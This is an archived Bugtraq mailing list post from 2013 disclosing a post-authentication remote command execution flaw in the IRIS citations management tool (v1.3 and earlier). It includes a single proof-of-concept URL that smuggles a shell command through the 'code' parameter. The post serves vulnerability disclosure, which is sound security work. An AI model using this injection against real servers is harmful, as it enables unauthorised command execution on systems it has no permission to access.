Home page logo
/

bugtraq logo Bugtraq mailing list archives

I Read It Somewhere (IRIS) citations management tool <= v1.3 (post auth) Remote Command Execution
From: aeon.s.flux () gmail com
Date: Sat, 9 Feb 2013 21:11:24 GMT

A vulnerability exists in IRIS citations management tool which allows a low privileged attacker to execute arbitrary 
commands.

Details can be found on my blog:
https://infosecabsurdity.wordpress.com/2013/02/09/iris-citations-management-tool-post-auth-remote-command-execution/ 

PoC:

http://[target]/[path]/index.php?p=add&import=spnro&code=a"+-T+0.1+||echo+`id`+>+/tmp/luls||"

~ aeon


  By Date           By Thread  

Current thread:
  • I Read It Somewhere (IRIS) citations management tool <= v1.3 (post auth) Remote Command Execution aeon . s . flux (Feb 11)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault